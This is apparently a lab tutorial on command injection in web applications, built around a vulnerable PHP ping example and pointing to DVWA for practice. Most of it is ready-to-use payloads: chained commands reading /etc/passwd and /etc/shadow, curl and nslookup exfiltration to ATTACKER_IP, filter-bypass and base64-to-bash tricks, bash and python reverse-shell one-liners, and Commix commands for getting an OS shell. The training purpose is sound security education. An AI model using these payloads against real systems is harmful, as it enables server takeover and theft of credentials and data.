๐ฏ Lab Objectives
- Understand how command injection vulnerabilities arise
- Detect injection points in web applications
- Use command chaining operators to inject commands
- Exploit blind command injection using time delays and out-of-band
- Escalate to a reverse shell from command injection
Step 1 โ What is Command Injection?
Command injection occurs when an application passes user-controlled input to a system shell without proper sanitisation. The attacker injects OS commands that the server executes with the application's privileges.
# Vulnerable PHP code example:
$ip = $_GET['ip'];
system("ping -c 1 " . $ip);
# Normal usage:
GET /ping?ip=8.8.8.8
โ runs: ping -c 1 8.8.8.8
# Injected:
GET /ping?ip=8.8.8.8; whoami
โ runs: ping -c 1 8.8.8.8; whoami
โ Output includes: www-data
Step 2 โ Detecting the Vulnerability
# Common injection points:
# - Ping / traceroute tools
# - DNS lookup tools
# - File conversion tools
# - Any field that takes input and does something on the server
# Test with simple time delay (safe, leaves no output)
; sleep 5
| sleep 5
&& sleep 5
`sleep 5`
$(sleep 5)
# If the page takes 5 extra seconds โ vulnerable!
Step 3 โ Basic Payloads
# Command chaining operators:
# ; โ run second command regardless of first's result
# | โ pipe first output to second command
# && โ run second only if first succeeds
# || โ run second only if first fails
# & โ run in background
# `cmd` โ command substitution
# $(cmd) โ command substitution (modern)
# Read sensitive files
; cat /etc/passwd
| cat /etc/passwd
&& cat /etc/passwd
; cat /etc/shadow
# System information
; whoami
; id
; uname -a
; hostname
# Network info
; ifconfig
; ip a
; netstat -tulnp
# List files
; ls -la /
; ls -la /home/
Step 4 โ Blind Command Injection
Sometimes the command output isn't shown on the page. Use time-based or out-of-band techniques.
# Time-based โ sleep and measure response time
; sleep 10
&& ping -c 10 127.0.0.1
# Out-of-band โ DNS exfiltration
# Start a listener: nc -lvnp 53 (or use Burp Collaborator)
; nslookup `whoami`.ATTACKER_IP
; curl http://ATTACKER_IP/`whoami`
# Write output to a web-accessible file
; whoami > /var/www/html/output.txt
# Then visit: http://target.com/output.txt
# Exfiltrate /etc/passwd via curl
; curl -d @/etc/passwd http://ATTACKER_IP/receive
Step 5 โ Filter Bypasses
# If spaces are filtered:
{cat,/etc/passwd}
cat${IFS}/etc/passwd
cat$IFS/etc/passwd
X=$'cat\x20/etc/passwd'&&$X
# If certain words are filtered:
c'a't /etc/passwd # quotes break keyword detection
/bin/c?t /etc/passwd # wildcards
/bin/ca* /etc/passwd
echo 'd2hvYW1p' | base64 -d | bash # base64 encoded "whoami"
# If slash is filtered:
echo${IFS}"whoami" # use echo trick
${PATH:0:1}etc${PATH:0:1}passwd # $PATH usually starts with /
# Case variation (works on Windows)
wHoAmI
CMD /C "whoami"
Step 6 โ Getting a Reverse Shell
# Start listener on Kali
nc -lvnp 4444
# Inject reverse shell one-liners:
; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# URL-encode for web delivery:
%3B+bash+-c+'bash+-i+>%26+/dev/tcp/ATTACKER_IP/4444+0>%261'
Step 7 โ Commix (Automated)
# Commix automates command injection detection and exploitation
sudo apt install commix -y
# Test a GET parameter
commix --url="http://target.com/ping?ip=8.8.8.8"
# Test POST parameter
commix --url="http://target.com/ping" --data="ip=8.8.8.8"
# With cookie (authenticated)
commix --url="http://target.com/ping?ip=8.8.8.8" --cookie="session=abc123"
# Get a shell directly
commix --url="http://target.com/ping?ip=8.8.8.8" --os-shell
๐ Injection Operator Reference
| Operator | Behaviour | Example |
|---|---|---|
; | Run second command always | 8.8.8.8; whoami |
| | Pipe output to second command | 8.8.8.8 | id |
&& | Run second if first succeeds | 8.8.8.8 && cat /etc/passwd |
|| | Run second if first fails | notanip || whoami |
`cmd` | Command substitution | `whoami` |
$(cmd) | Command substitution | $(id) |
& | Background (blind) | 8.8.8.8 & sleep 5 |
Lab Complete! Command injection gives direct OS access. Always test every input field โ even ones that don't seem dangerous. Practice on DVWA (Command Injection module).